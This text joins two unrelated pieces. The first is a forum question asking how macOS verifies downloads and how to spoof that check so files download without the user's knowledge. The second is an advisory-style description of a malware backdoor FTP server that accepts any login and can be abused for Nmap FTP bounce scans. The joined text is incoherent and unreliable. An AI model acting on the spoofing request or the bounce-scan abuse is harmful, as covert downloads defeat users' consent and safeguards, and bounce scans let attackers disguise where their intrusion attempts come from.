Permissions and verification in mac downloads.

For any mac users here, how does Apple verify that you downloaded from a website before so it can freely download from it without asking for permission, for example, if you downloaded something from google drive for the first time, your mac will launch a pop up that tells you to either block the download or allow it, so how does your make verify that? and is there a way to spoof it to automatically download a file without the user's permission or notice? Thanks.

Vulnerability: Port Bounce Scan (MITM)
Description: The malware listens on TCP ports 10426, 56185, its FTP component accepts any username/password credentials. Third-party attackers who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.
